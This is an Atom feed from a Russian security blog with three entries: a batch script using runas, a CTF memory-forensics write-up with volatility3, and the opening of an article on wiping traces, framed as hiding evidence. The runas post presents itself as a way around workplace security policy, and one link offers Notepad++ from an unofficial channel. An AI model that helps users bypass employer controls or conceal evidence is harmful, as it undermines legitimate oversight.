<?xml version="1.0" encoding="utf-8" ?><feed xmlns="http://www.w3.org/2005/Atom" xmlns:tt="http://teletype.in/" xmlns:opensearch="http://a9.com/-/spec/opensearch/1.1/"><title>Hunter Ghoul</title><author><name>Hunter Ghoul</name></author><id>https://teletype.in/atom/hunterghoul_team</id><link rel="self" type="application/atom+xml" href="https://teletype.in/atom/hunterghoul_team?offset=0"></link><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><link rel="next" type="application/rss+xml" href="https://teletype.in/atom/hunterghoul_team?offset=10"></link><link rel="search" type="application/opensearchdescription+xml" title="Teletype" href="https://teletype.in/opensearch.xml"></link><updated>2026-05-14T16:26:45.472Z</updated><entry><id>hunterghoul_team:cmd1</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/cmd1?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>Runas - пишем скрипт для запуска исполняемых файлов Windows от имени другого пользователя</title><published>2025-04-24T14:15:55.665Z</published><updated>2025-04-24T14:15:55.665Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img2.teletype.in/files/9f/9b/9f9b14ab-4c5d-44f6-ba1d-e0500f593ae6.png"></media:thumbnail><category term="dev" label="dev"></category><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/c4/d5/c4d53c29-df3e-4dd7-aca3-cb04cc4046d8.png&quot;&gt;Всем привет! Сегодня мы с вами научимся писать свой первый простенький скрипт для командной строки Windows. В этой статье мы рассмотрим основные проблемы кодировок в CMD, команды вывода пользователей и фильтрации данных с помощью т.н. &quot;конвейера&quot;, а также рассмотрим встроенную программу &quot;runas&quot;</summary><content type="html">
  &lt;figure id=&quot;2XrK&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/d5/c4d53c29-df3e-4dd7-aca3-cb04cc4046d8.png&quot; width=&quot;973&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wPay&quot;&gt;Всем привет! Сегодня мы с вами научимся писать свой первый простенький скрипт для командной строки Windows. В этой статье мы рассмотрим основные проблемы кодировок в CMD, команды вывода пользователей и фильтрации данных с помощью т.н. &amp;quot;конвейера&amp;quot;, а также рассмотрим встроенную программу &amp;quot;runas&amp;quot;&lt;/p&gt;
  &lt;p id=&quot;l350&quot;&gt;Первым делом рассмотрим структуру нашего скрипта:&lt;/p&gt;
  &lt;pre id=&quot;9EaN&quot;&gt;@echo off
chcp 65001
echo. &amp;amp; echo ---Текущее имя пользователя---
whoami
echo. &amp;amp; echo ---Имена всех пользователей---
chcp 866
echo.
wmic useraccount get name, status | find &amp;quot;OK&amp;quot;
echo. &amp;amp; echo --------------------
chcp 65001
echo. &amp;amp; set /p username=&amp;quot;Введите имя пользователя: &amp;quot;
echo Выбран пользователь: %username%
set /p userpath=&amp;quot;Перенесите сюда .exe приложение которое хотите запустить (не ярлык) и нажмите Enter: &amp;quot;
echo &amp;quot;Попытка запуска приложения...&amp;quot;
echo %username% %userpath%
runas /user:%username% %userpath%&lt;/pre&gt;
  &lt;p id=&quot;GbFi&quot;&gt;Вот собственно наш код. Давайте подробнее изучим основные его строки.&lt;/p&gt;
  &lt;figure id=&quot;dpYC&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/29/d8/29d8355b-9cec-42b3-ab53-779e08eacad0.png&quot; width=&quot;751&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;FAyV&quot;&gt;chcp &amp;lt;номер кодировки&amp;gt; - отвечает за переключение кодировки в открытой cmd сессии. Это требуется для нормальной работы с кириллицей и латиницей, а также иными языками, плохо работающими на базовой Windows кодировке.&lt;/p&gt;
  &lt;p id=&quot;acxX&quot;&gt;echo. - просто ставит enter в выводе в консоли, отображая ваше сообщение или результат выполнения команды на новой строке.&lt;/p&gt;
  &lt;p id=&quot;cUBp&quot;&gt;echo &amp;lt;ваше сообщение&amp;gt; - выводит сообщение на экран.&lt;/p&gt;
  &lt;p id=&quot;hmUQ&quot;&gt;@echo off - убирает ваш ввод команд скрипта, что убирает лишний хлам в выводе в консоли.&lt;/p&gt;
  &lt;p id=&quot;1yCh&quot;&gt;set &amp;lt;имя переменной&amp;gt; &amp;lt;значение переменной&amp;gt; - сохраняет в памяти значение для заданной переменной. Если такой переменной нет, создает её и сохраняет в ней указанное значение.&lt;/p&gt;
  &lt;p id=&quot;9NlT&quot;&gt;set /p &amp;lt;имя переменной&amp;gt; &amp;lt;Placeholder - он же заполнитель текста&amp;gt; - дает возможность задать пользователю значение переменной с помощью ввода текста в CMD.&lt;/p&gt;
  &lt;p id=&quot;A1dM&quot;&gt;echo %имя_переменной% - выводит значение переменной. Использование %имя_переменной% в любом месте команд вставляет сохраненное значение переменной&lt;/p&gt;
  &lt;p id=&quot;qd21&quot;&gt;runas /user:%username% %userpath% - запускает указанную программу от имени указанного пользователя.&lt;/p&gt;
  &lt;p id=&quot;uqEq&quot;&gt;whoami - вывод текущего пользователя с которого вы сидите&lt;/p&gt;
  &lt;p id=&quot;0cD0&quot;&gt;wmic useraccount - выводит в сыром виде все аккаунты&lt;/p&gt;
  &lt;p id=&quot;sC00&quot;&gt;get name, status | find &amp;quot;OK&amp;quot; - фильтрует данные и выводит релевантные учетки.&lt;/p&gt;
  &lt;p id=&quot;hcbZ&quot;&gt;Каков итог?&lt;/p&gt;
  &lt;p id=&quot;Dckq&quot;&gt;Теперь с помощью данного скрипта вы можете не меняя учетную запись запустить программу от имени другого пользователя. В ряде определенных случаев это бывает очень полезно, особенно когда вы на работе и нужно что-то запустить от имени админа, не выходя из рабочей учетки, но при этом классический метод запуска от имени админа заблокирован политикой безопасности.&lt;/p&gt;
  &lt;p id=&quot;hNVD&quot;&gt;Всё что нужно это:&lt;/p&gt;
  &lt;p id=&quot;z7Ht&quot;&gt;1. Запустить скрипт&lt;/p&gt;
  &lt;p id=&quot;MQUs&quot;&gt;2. Выбрать нужного пользователя&lt;/p&gt;
  &lt;p id=&quot;coKE&quot;&gt;3. Указать абсолютный путь в кавычках ИЛИ - просто перетащить EXE (важно, не ярлык) файл в консоль&lt;/p&gt;
  &lt;p id=&quot;QoDk&quot;&gt;4. Ввести пароль от выбранной учетки&lt;/p&gt;
  &lt;p id=&quot;SU3D&quot;&gt;5. Готово! Если прога поддерживает данную фичу, то всё успешно запустится и будет работать.&lt;/p&gt;
  &lt;p id=&quot;jjwX&quot;&gt;На этом всё. Такая вот простенькая и коротенькая статья, учащая базовым командам в cmd и написанию скриптов без всяких python и прочих зависимостей ^)&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:volatility</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/volatility?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>Write-up: расследуем бэкап VMware с volatility3</title><published>2024-11-16T10:54:46.800Z</published><updated>2024-11-16T10:54:46.800Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/38/61/3861577c-8937-4420-ac83-00e80152acc6.png"></media:thumbnail><category term="forensic" label="forensic"></category><summary type="html">&lt;img src=&quot;https://img2.teletype.in/files/94/60/94602eda-b9d6-48cc-b1f8-f0d57aac2a05.png&quot;&gt;Всем привет! Сегодня мы с вами будем проходить задание CTF по расследованию (forensic - компьютерная криминалистика) резервной копии виртуальной машины VMWare.</summary><content type="html">
  &lt;figure id=&quot;2E49&quot; class=&quot;m_original&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/94/60/94602eda-b9d6-48cc-b1f8-f0d57aac2a05.png&quot; width=&quot;249&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;d5CK&quot;&gt;Всем привет! Сегодня мы с вами будем проходить задание CTF по расследованию (forensic - компьютерная криминалистика) резервной копии виртуальной машины VMWare.&lt;/p&gt;
  &lt;p id=&quot;ibrK&quot;&gt;Приступим.&lt;/p&gt;
  &lt;h3 id=&quot;Jm5y&quot;&gt;Вводные данные&lt;/h3&gt;
  &lt;p id=&quot;TNcB&quot;&gt;И так, всё что мы имеем - это некий файл формата .vmem&lt;/p&gt;
  &lt;figure id=&quot;3yZN&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/c4/0d/c40dd84b-5dc1-4643-ace9-b50effafafa6.png&quot; width=&quot;699&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;RhYA&quot;&gt;Если &lt;a href=&quot;https://www.solvusoft.com/ru/file-extensions/file-extension-vmem/&quot; target=&quot;_blank&quot;&gt;погуглить&lt;/a&gt; инфу что это за файл, то найдем что это резервная копия VMware машины:&lt;/p&gt;
  &lt;figure id=&quot;DEdI&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/69/0e/690eb749-e00e-441f-91bb-ac9474b4a290.png&quot; width=&quot;1201&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;eD54&quot;&gt;Ну и тут уже встаёт вопрос - как этот файл открыть и изучить? Логично в голову приходит желание скачать VMware Workstation, но спешу вас расстроить - из этого ничего не выйдет. Да и если получится импортировать бэкап (если что backup - это резервная копия, мало ли кто не знал &lt;s&gt;сочувствую вам&lt;/s&gt;) и запустить виртуальную машину, то мы нарушим тот временной промежуток в который была сделана резервная копия, ведь машина продолжит работать дальше и если там был например какой-то вирус шифровальщик, то он просто зашифрует нам машину.&lt;/p&gt;
  &lt;p id=&quot;YvSn&quot;&gt;Из этого следует, что стоит погуглить чем можно открыть данный файл:&lt;/p&gt;
  &lt;figure id=&quot;OIqT&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2e/ca/2ecacd88-aebf-41c0-9c61-be91b51e72e6.png&quot; width=&quot;929&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;BB0I&quot;&gt;Ну и здесь нам выпадают видео и статьи по решению данных проблем. Программа называется &lt;a href=&quot;https://github.com/volatilityfoundation/volatility3&quot; target=&quot;_blank&quot;&gt;volatility3&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;Lz3k&quot;&gt;Переходим по ссылке выше и копируем ссылку на репозиторий:&lt;/p&gt;
  &lt;figure id=&quot;5nw2&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/09/de/09de8eeb-5a64-4f98-b208-5e4853a51c20.png&quot; width=&quot;1166&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;MX2C&quot;&gt;Если у вас не установлен на системе git, то можете установить его, либо просто скачать архивом данный репозиторий и распаковать у себя в удобном месте.&lt;/p&gt;
  &lt;p id=&quot;yhJI&quot;&gt;Далее приступим к работе с данным инструментом.&lt;/p&gt;
  &lt;h3 id=&quot;nJ3j&quot;&gt;Установка Volatility3&lt;/h3&gt;
  &lt;p id=&quot;kOfW&quot;&gt;Что нам нужно установить перед этим:&lt;/p&gt;
  &lt;ol id=&quot;w8bt&quot;&gt;
    &lt;li id=&quot;TD3t&quot;&gt;Git (опционально) - скачать можно &lt;a href=&quot;https://git-scm.com/downloads&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;61EZ&quot;&gt;Python - скачать последнюю версию &lt;a href=&quot;https://www.python.org/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;.&lt;/li&gt;
    &lt;li id=&quot;vbKt&quot;&gt;Volatility3 - скачать с &lt;a href=&quot;https://github.com/volatilityfoundation/volatility3&quot; target=&quot;_blank&quot;&gt;репозитория&lt;/a&gt;.&lt;/li&gt;
  &lt;/ol&gt;
  &lt;p id=&quot;XU2E&quot;&gt;Ну и в общем то всё, установка на любой системе Windows/Unix. Главное чтобы был python с pip. &lt;/p&gt;
  &lt;p id=&quot;pdki&quot;&gt;Теперь заходим в распакованную папку с репозиторием. Лично я скачаю репозиторий с помощью git командой:&lt;/p&gt;
  &lt;p id=&quot;ZKu7&quot;&gt;&lt;code&gt;git clone https://github.com/volatilityfoundation/volatility3.git&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;XD4u&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/10/0110cd0a-1505-4939-af50-a35ce4f81e99.png&quot; width=&quot;1393&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wWSG&quot;&gt;Скачал в ту же папку где и находится наш файл&lt;/p&gt;
  &lt;figure id=&quot;74wK&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/b9/2a/b92a6c43-6273-47f4-8ca2-01426b8c36fb.png&quot; width=&quot;982&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;OrQl&quot;&gt;Открываем терминал в данной папке, идем в папку volatility3 и пишем команду:&lt;/p&gt;
  &lt;p id=&quot;e8r9&quot;&gt;&lt;code&gt;pip install -r requirements.txt&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;lq1E&quot;&gt;У кого Unix система с разными питонами пишут соответственно для третьей версии:&lt;/p&gt;
  &lt;p id=&quot;DKax&quot;&gt;&lt;code&gt;pip3 install -r requirements.txt&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;0JlW&quot;&gt;Далее запускаем программу командой:&lt;/p&gt;
  &lt;p id=&quot;XD0z&quot;&gt;&lt;code&gt;python vol.py -h&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;aRml&quot;&gt;Для Unix аналогично по необходимости добавляем троечку:&lt;/p&gt;
  &lt;p id=&quot;BcTF&quot;&gt;&lt;code&gt;python3 vol.py -h&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;eIkU&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/18/91/18911e3f-53db-494a-a19f-cab9f2608f98.png&quot; width=&quot;1417&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;H0By&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/01/fe/01fe8eb4-72fc-4d7d-805b-557040636810.png&quot; width=&quot;1458&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;h1Mh&quot;&gt;На этом установка окончена.&lt;/p&gt;
  &lt;p id=&quot;azA9&quot;&gt;Документация официальная &lt;a href=&quot;https://volatility3.readthedocs.io/en/latest/&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;.&lt;/p&gt;
  &lt;h3 id=&quot;rGI2&quot;&gt;Расследуем инцидент (ну в смысле флаг дайте мне йоу)&lt;/h3&gt;
  &lt;p id=&quot;LiW3&quot;&gt;Окей, установили, открыли, теперь разбираемся что тут происходит.&lt;/p&gt;
  &lt;p id=&quot;J5j2&quot;&gt;Для начала кто хочет повторить всё со мной скачайте файл бэкапа для расследования - скачать &lt;a href=&quot;https://t.me/hunterghoulchat/96&quot; target=&quot;_blank&quot;&gt;тут&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;jSrg&quot;&gt;Как я писал в своем посте ранее (кто не читал вот &lt;a href=&quot;https://t.me/hunterghoul_team/23&quot; target=&quot;_blank&quot;&gt;ссылочка&lt;/a&gt;) у нас есть модули, поделенные на три раздела по системам:&lt;/p&gt;
  &lt;ul id=&quot;fe8m&quot;&gt;
    &lt;li id=&quot;OJeH&quot;&gt;windows.название_модуля&lt;/li&gt;
    &lt;li id=&quot;rBH2&quot;&gt;linux.название_модуля&lt;/li&gt;
    &lt;li id=&quot;fDqV&quot;&gt;mac.название_модуля&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;uTu5&quot;&gt;Ну соответственно формат команды в нашем случае примерно такой:&lt;/p&gt;
  &lt;p id=&quot;u0qJ&quot;&gt;python vol.py -f путь_до_нашей_резервной_копии и далее команда.&lt;/p&gt;
  &lt;p id=&quot;4M8p&quot;&gt;Например:&lt;/p&gt;
  &lt;p id=&quot;NIf3&quot;&gt;&lt;code&gt;python vol.py -f ../task.vmem windows.info&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;Nk4B&quot;&gt;Здесь я указал относительный путь о котором писал в своих статьях ранее. Кто не читал рекомендую &lt;a href=&quot;https://teletype.in/@hunterghoul_team/path-traversal&quot; target=&quot;_blank&quot;&gt;ознакомиться&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;Wfvh&quot;&gt;Здесь никто вам не мешает указать абсолютный:&lt;/p&gt;
  &lt;p id=&quot;H2bP&quot;&gt;&lt;code&gt;python vol.py -f D:\download\love_keys\task.vmem windows.info&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;idrO&quot;&gt;Если всё успешно, у вас пойдет процесс разбора копии и чтение его данных:&lt;/p&gt;
  &lt;figure id=&quot;krLL&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/6e/7d/6e7d0389-8f18-4e92-9489-30f8abbd3539.png&quot; width=&quot;1463&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;pKv6&quot;&gt;В данном случае не было информации какая именно система, так что сначала я попробовал пару команд для linux, что ни к чему не привело, затем к windows, и тут уже мне что-то показало:&lt;/p&gt;
  &lt;figure id=&quot;ukJl&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9f/b5/9fb5d366-2bd7-43bb-a973-526108c5eaaf.png&quot; width=&quot;765&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;y1GN&quot;&gt;Модуль windows.info показывает нам общие данные виртуальной windows системы.&lt;/p&gt;
  &lt;p id=&quot;i50M&quot;&gt;Нам же для решения задачи нужно найти файл в котором спрятан флаг (в реальности это может быть вирус или что-угодно, улика в общем).&lt;/p&gt;
  &lt;p id=&quot;3eHg&quot;&gt;Для этого запустим следующую команду:&lt;/p&gt;
  &lt;p id=&quot;yi6Q&quot;&gt;&lt;code&gt;python vol.py -f ../task.vmem windows.filescan &amp;gt; file.txt&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;mI3a&quot;&gt;Здесь:&lt;/p&gt;
  &lt;ul id=&quot;t1nd&quot;&gt;
    &lt;li id=&quot;rKFP&quot;&gt;windows.filescan - вытягивает все файлы из системы&lt;/li&gt;
    &lt;li id=&quot;ZP8H&quot;&gt;&amp;gt; file.txt - перенаправляет весь результат в файл&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;gPBF&quot;&gt;Теперь открываем наш файлик после выполнения команды (даже если выдало ошибку как у меня) любым удобным редактором, хоть блокнотом:&lt;/p&gt;
  &lt;figure id=&quot;7K1u&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9c/2e/9c2efa5d-6a1e-409f-9e89-8e89a18ce173.png&quot; width=&quot;1291&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;tZqa&quot;&gt;Здесь видим offset - это адрес памяти в котором  хранится содержимое файла, и name - путь до файла с его названием.&lt;/p&gt;
  &lt;p id=&quot;gR2E&quot;&gt;Нам интересно следующее - давайте посмотрим какие есть пользователи в этой системе. Для этого выполним поиск по пути \Users\&lt;/p&gt;
  &lt;figure id=&quot;mEqq&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/5f/72/5f72b12e-1667-4e23-ba71-c3722ed55f4f.png&quot; width=&quot;1347&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;2JYy&quot;&gt;Видим что у нас есть некий пользователь Oleg. Хорошо, давайте дополним наш путь \Users\Oleg\ и посмотрим что у нашего олега за файлы.&lt;/p&gt;
  &lt;figure id=&quot;8iSi&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img1.teletype.in/files/4d/79/4d7900fe-fc67-44e9-9bfd-438822fcbfe7.png&quot; width=&quot;1363&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;pDPA&quot;&gt;Пролистав некоторое количество строк видим такой вот интересный файл (хотя куда более интересно выглядит файл с базой данных на первом скрине, но да ладно).&lt;/p&gt;
  &lt;p id=&quot;hoiy&quot;&gt;Попробуем его выкачать. Для этого нам понадобится наш offset - то есть адрес памяти указанный слева:&lt;/p&gt;
  &lt;figure id=&quot;Q5pz&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/fa/f0/faf0167f-2670-4909-80cd-b284f370daad.png&quot; width=&quot;1424&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;gX1X&quot;&gt;Копируем его и вбиваем в следующую команду:&lt;/p&gt;
  &lt;p id=&quot;GyWy&quot;&gt;&lt;code&gt;python vol.py -f ../task.vmem windows.dumpfiles --physaddr 0x1e47d5f0&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;rspk&quot;&gt;Где:&lt;/p&gt;
  &lt;ul id=&quot;AKbG&quot;&gt;
    &lt;li id=&quot;FOQA&quot;&gt;windows.dumpfile - выкачивает из резервной копии наш файл&lt;/li&gt;
    &lt;li id=&quot;QuMS&quot;&gt;--physaddr offset_файла - указывает на файл который нам надо выкачать.&lt;/li&gt;
  &lt;/ul&gt;
  &lt;p id=&quot;ngou&quot;&gt;Если не указать адрес и ввести просто:&lt;/p&gt;
  &lt;p id=&quot;cWgL&quot;&gt;&lt;code&gt;python vol.py -f ../task.vmem windows.dumpfiles&lt;/code&gt;&lt;/p&gt;
  &lt;p id=&quot;kKsX&quot;&gt;То эта команда выкачает все файлы из бэкапа.&lt;/p&gt;
  &lt;p id=&quot;QT6r&quot;&gt;Оно нам надо? Оно нам не надо. Вводим команду и получаем такой вот файл:&lt;/p&gt;
  &lt;figure id=&quot;1Oee&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e0/41/e0413820-4b71-4962-b64f-4b36eea128ce.png&quot; width=&quot;1388&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;xjdm&quot;&gt;Теперь ищем его в папке с нашей утилитой&lt;/p&gt;
  &lt;figure id=&quot;g4Ou&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/98/f2/98f26c29-87ae-4454-b0b1-b5ae0b112d6a.png&quot; width=&quot;899&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;IaGI&quot;&gt;Отлично, откроем его с помощью того же блокнота:&lt;/p&gt;
  &lt;figure id=&quot;yMfm&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/61/77/61778c8d-a178-4c02-ba77-2ba43b484482.png&quot; width=&quot;1232&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;4AQo&quot;&gt;Как видим кодировка не позволяет нам прочитать что тут написано.&lt;/p&gt;
  &lt;p id=&quot;JaH7&quot;&gt;У нас есть два варианта:&lt;/p&gt;
  &lt;p id=&quot;5Dfw&quot;&gt;Вариант 1 (геморройный)&lt;/p&gt;
  &lt;p id=&quot;ye35&quot;&gt;Идем на сайт &lt;a href=&quot;https://2cyr.com/decode/&quot; target=&quot;_blank&quot;&gt;https://2cyr.com/decode/&lt;/a&gt; вставляем туда нашу абракадабру и нажимаем на ок:&lt;/p&gt;
  &lt;figure id=&quot;fbXk&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d4/4d/d44d4af6-de76-4d35-9441-63600e80d11a.png&quot; width=&quot;1892&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;muNI&quot;&gt;После этого у нас появляется окно с возможностью выбрать адекватную кодировку. Смотрим на то, что более похоже на читаемый текст.&lt;/p&gt;
  &lt;figure id=&quot;ftqO&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/d7/65/d765fcf1-2f4e-4f15-9d7f-12102bd44dc9.png&quot; width=&quot;1907&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;TJhf&quot;&gt;Находим что-то более читаемое в этих списках. Тыкаем на это и жмем на ок.&lt;/p&gt;
  &lt;figure id=&quot;JWy7&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/2a/7a/2a7a09aa-b19f-402b-b7ab-3b8354905e89.png&quot; width=&quot;1288&quot; /&gt;
  &lt;/figure&gt;
  &lt;figure id=&quot;AJrT&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img3.teletype.in/files/e0/90/e090cdf5-d0f8-4107-ad97-cd7dfb9477c4.png&quot; width=&quot;1910&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;BNtS&quot;&gt;Окей, мы получили что-то, но ещё не то что надо. Пробуем следующие варианты из списка.&lt;/p&gt;
  &lt;p id=&quot;d2Nz&quot;&gt;И в конечном итоге натыкаемся на вариант без всяких Ав ^ и прочих странных символов:&lt;/p&gt;
  &lt;figure id=&quot;JdjD&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img4.teletype.in/files/73/a5/73a5ed7f-a83f-4d86-8a55-d506b24f7635.png&quot; width=&quot;1910&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;6nm4&quot;&gt;Вариант второй - ибо зачем вариант первый.&lt;/p&gt;
  &lt;p id=&quot;RFRR&quot;&gt;Качаем &lt;a href=&quot;https://notepad-plus-plus.org/downloads/&quot; target=&quot;_blank&quot;&gt;Notepad++&lt;/a&gt; и открываем через него наш файл:&lt;/p&gt;
  &lt;figure id=&quot;oeAw&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/9a/32/9a32e2bd-d8cd-4181-b748-0b0273b64d19.png&quot; width=&quot;921&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;W9YY&quot;&gt;P.S. лично у меня в России этот блокнот провайдер заблокировал так как в нём спрятался самый опасный террорист в мире, так что кто тоже в беде можете скачать последнюю версию с &lt;a href=&quot;https://t.me/hunterghoulchat/97&quot; target=&quot;_blank&quot;&gt;моего канала&lt;/a&gt;.&lt;/p&gt;
  &lt;p id=&quot;U0YY&quot;&gt;Теперь нам остается только убрать все пробелы.&lt;/p&gt;
  &lt;p id=&quot;r2Dn&quot;&gt;Для этого я написал простой скрипт на python который это сделает за вас. Просто скопируйте содержимое файла и вставьте в окно ввода программы:&lt;/p&gt;
  &lt;figure id=&quot;L0t2&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/93/b2/93b2a938-d964-4011-bac0-11167ade63d7.png&quot; width=&quot;1667&quot; /&gt;
  &lt;/figure&gt;
  &lt;p id=&quot;wXqX&quot;&gt;Скачать скрипт можно &lt;a href=&quot;https://t.me/hunterghoulchat/98&quot; target=&quot;_blank&quot;&gt;здесь&lt;/a&gt;. Запуск командой:&lt;/p&gt;
  &lt;p id=&quot;Mz1Q&quot;&gt;&lt;code&gt;python delnull.py&lt;/code&gt;&lt;/p&gt;
  &lt;figure id=&quot;Nsra&quot; class=&quot;m_column&quot;&gt;
    &lt;img src=&quot;https://img2.teletype.in/files/10/39/1039c8b2-b9ed-4766-a0ba-075d19d505fa.png&quot; width=&quot;1356&quot; /&gt;
  &lt;/figure&gt;
  &lt;h3 id=&quot;PxLW&quot;&gt;Итоги&lt;/h3&gt;
  &lt;p id=&quot;aWPt&quot;&gt;Компьютерная криминалистика - интересное занятие, требующее усидчивости, хороших навыков в автоматизации анализа собираемой информации, в том числе с помощью написания собственных скриптов.&lt;/p&gt;
  &lt;p id=&quot;7Ekv&quot;&gt;Попробуйте повторить данные действия дома чтобы поближе проникнуться в мир форензики.&lt;/p&gt;
  &lt;p id=&quot;Gb06&quot;&gt;Благодарю за прочтение статьи.&lt;/p&gt;

</content></entry><entry><id>hunterghoul_team:clear</id><link rel="alternate" type="text/html" href="https://teletype.in/@hunterghoul_team/clear?utm_source=teletype&amp;utm_medium=feed_atom&amp;utm_campaign=hunterghoul_team"></link><title>Bleach-Bitch - или чистим следы после взлома Пентагона</title><published>2024-11-14T12:25:28.034Z</published><updated>2024-11-14T12:25:28.034Z</updated><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="https://img4.teletype.in/files/bf/29/bf29b1be-d880-401d-b6f1-bd70b04c8573.png"></media:thumbnail><category term="anonimity" label="Anonimity"></category><summary type="html">&lt;img src=&quot;https://img1.teletype.in/files/8b/84/8b84bfbb-3b17-4e0d-af8f-eb2aafa0fe0d.png&quot;&gt;Всем привет! Сегодня мы рассмотрим приложения для чистки следов и затирания жесткого диска. Приятного прочтения.</summary><content type="html">
  &lt;p id=&quot;NyJV&quot;&gt;Всем привет! Сегодня мы рассмотрим приложения для чистки следов и затирания жесткого диска. Приятного прочтения.&lt;/p&gt;
  &lt;h3 id=&quot;tTBt&quot;&gt;Дисклеймер&lt;/h3&gt;
  &lt;p id=&quot;JRha&quot;&gt;Автор статьи категорически против нарушения законодательства стран. Изложенная информация предоставлена исключительно в образовательных целях в шуточной форме. Использование данной информации для сокрытия улик жестоко карается по закону. Автор не несет ответственности за действия читателей.&lt;/p&gt;
  &lt;h3 id=&quot;0Oam&quot;&gt;Введение&lt;/h3&gt;
  &lt;p id=&quot;bxmJ&quot;&gt;И так, вы решительно удалили лучшее свое домашнее видео перед трудоустройством в силовые структуры. И тут всё бы ничего, ваш телефон забрали на проверку из-за некоторых опасений и дополнительном сборе информации. И вот ваш товарищ майор прикрывшись газеткой наяривает на вас и вашу жену. Как так вышло? Сейчас рассмотрим простым языком.&lt;/p&gt;
